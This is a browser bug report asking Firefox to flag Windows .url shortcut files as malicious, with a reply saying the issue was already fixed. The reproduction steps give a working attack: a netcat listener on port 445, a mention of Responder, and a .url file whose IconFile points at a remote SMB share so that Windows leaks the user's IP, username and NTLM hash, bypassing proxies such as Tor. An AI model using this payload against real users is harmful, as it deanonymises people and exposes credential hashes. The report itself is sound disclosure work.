URL files on windows should be flagged as potentially malicious
(Toolkit :: Safe Browsing, enhancement)
(Reporter: bugzilla_mozilla_org, Unassigned)
Steps to reproduce:
Open a listener on port 445(smb) anywhere on the internet. A simple
ncat -lvp 445is enough for obtaining a real IP address bypassing browser's proxy settings(impacts tor browser), although responder(https://github.com/lgandx/Responder) can also be used to grab more data about the user including arbitrary environment variables, the real username and the NTLM password hash.
Create a file with an url extension containing the following contents and host it anywhere on the web(replacing x.x.x.x with the ip of the listener created in the previous step).
[InternetShortcut] URL=whatever WorkingDirectory=whatever IconFile=\\x.x.x.x\%USERNAME%.icon IconIndex=1
- Download the file created in the previous step.
Firefox downloaded the file. If you were to open the downloads directory in windows file explorer it would send out a ping to the server containing a lot of potentially sensitive data.
Firefox should have flagged the file as potentially malicious and not downloaded it automatically even with
browser.download.always_ask_before_handling_new_types set to false.
This is the behavior of the chromium browser(https://bugs.chromium.org/p/chromium/issues/detail?id=335029)
4 months ago
This was fixed in bug 1809923. Sorry we didn't notice this one... "SafeBrowsing" isn't the feature that controls this.